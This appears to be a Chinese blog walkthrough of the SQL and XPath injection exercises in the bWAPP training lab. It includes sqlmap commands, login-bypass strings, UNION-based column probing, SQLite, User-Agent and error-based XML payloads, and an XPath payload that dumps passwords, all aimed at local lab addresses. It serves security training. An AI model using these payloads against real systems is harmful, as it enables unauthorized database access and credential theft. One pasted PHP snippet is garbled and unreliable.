bwapp sql部分

SQL Injection (GET/Search)

这里的题都可以用sqlmap解决
sqlmap详解,可以参考这篇文章

构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63"
这里需要加cooike值,靶场需要登录
然后就会自动构造
在这里插入图片描述

SQL Injection (GET/Select)

在这里插入图片描述
使用order by 尝试可知,能试到7,
使用联合查询试一下,可以,然后就开始查库,查表,查列

SQL Injection (POST/Search)

使用了post传参而已
解决方法和get一样

SQL Injection (POST/Select)

在这里插入图片描述
通过抓包可以知道,不仅是post传参,而且title改成了movie,
解决方法一样

SQL Injection (AJAX/JSON/jQuery)

首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”(异步 JavaScript 和 XML),通过在后台与服务器进行少量数据交换,Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。比如我们使用百度的时候,有个功能叫“搜索预测”,当你输入第一个字的时候,下拉框里就会出现大量可能的关键词候选,这个用的就是ajax技术,而它的返回值一般是json/xml格式的,jQuery中提供实现ajax的方法(因为js很容易捕捉客户端的按键行为)

在这里插入图片描述
抓包推断输入的aget传参方法,但
URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是,sqli_10-1.php,观察源代码发现
在这里插入图片描述
sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php,sqli_10-2.php立马执行查询,所以真正的注入点在sqli_10-2.php的title参数
当然,sqlmap能解决

SQL Injection (CAPTCHA)

进入后,直接输点东西,观看url,即可知道点在哪里

SQL Injection (Login Form/Hero)

在这里插入图片描述
用sql语句构造绕过,
admin
aa ' or 'a' = 'a
这是我采用的一种写法
在这里插入图片描述
用sqlmap的话,
这样构造
sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login
用给定的payload进行post注入

SQL Injection (Login Form/User)

在这里插入图片描述
order by 先爆破
当为9的时候
在这里插入图片描述
当为10的时候,
在这里插入图片描述
因此我们就可以相信他是9
' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位
但尝试后感觉不行,最后搜索到的大佬是这样写的
' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
原因http://www.mamicode.com/info-detail-2239051.html

SQL Injection (SQLite)

SQLite 简介

SQLite是一个软件库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL
数据库引擎。SQLite是一个增长最快的数据库引擎,这是在普及方面的增长,与它的尺寸大小无关。SQLite 源代码不受版权限制。

sqlmap可以解决

SQL Injection - Stored (Blog)

在这里插入图片描述
用sqlmap将post参数加上去

SQL Injection - Stored (SQLite)

meetsec’,’’);
meetsec’,sqlite_version());
meetsec’,(select name from sqlite_master where type=‘table’));
meetsec’,(select login||":"||password from users)) – -
新的独立的注入方法

SQL Injection - Stored (User-Agent)

在这里插入图片描述
抓包,修改UA为单引号,出现报错
继续
1' ,(select version()))#
1' ,(select user()))#,这样都可以查询到
在这里插入图片描述

SQL Injection - Stored (XML)

构造post参数
<reset><login>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</login><secret>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</secret></reset>

在这里插入图片描述

XML/XPath Injection (Login Form)

XPath其实和sql查询挺像,区别在于sql查询是在数据库中查数据,Xpath是在xml中找信息,既然如此只要熟悉一下Xpath的语法,知道它的特点即可找到对应的注入思路

在 XPath 中,有七种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档节点(或称为根节点)。节点之间存在父、子、先辈、后代、同胞关系,以t3stt3st.xml为例
根节点<root1> 、元素节点<user><username><key><hctfadmin>、属性节点name='user1'
<root1><user><htcfadmin>的父节点,同时也是<user><hctfadmin><username><key>的先辈。和是同胞节点。

在这里插入图片描述
构造meetset' or '1'='1,成功

在这里插入图片描述

XML/XPath Injection (Search)

在这里插入图片描述
$xml = simplexml_load_file(“passwords/heroes.xml”);

// XPath search
// $result = x m l − > x p a t h ( " / / h e r o [ g e n r e = ′ xml->xpath("//hero[genre = ' xml>xpath("//hero[genre=genre’]/movie");
$result = x m l − > x p a t h ( " / / h e r o [ c o n t a i n s ( g e n r e , ′ xml->xpath("//hero[contains(genre, ' xml>xpath("//hero[contains(genre,genre’)]/movie");

那么我们补全我们需要但他所缺乏的
构造payload')]/password | a[contains(a,'
这样完整的语句就是
$result = $xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie");

$result = $xml->xpath("//hero/password");

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值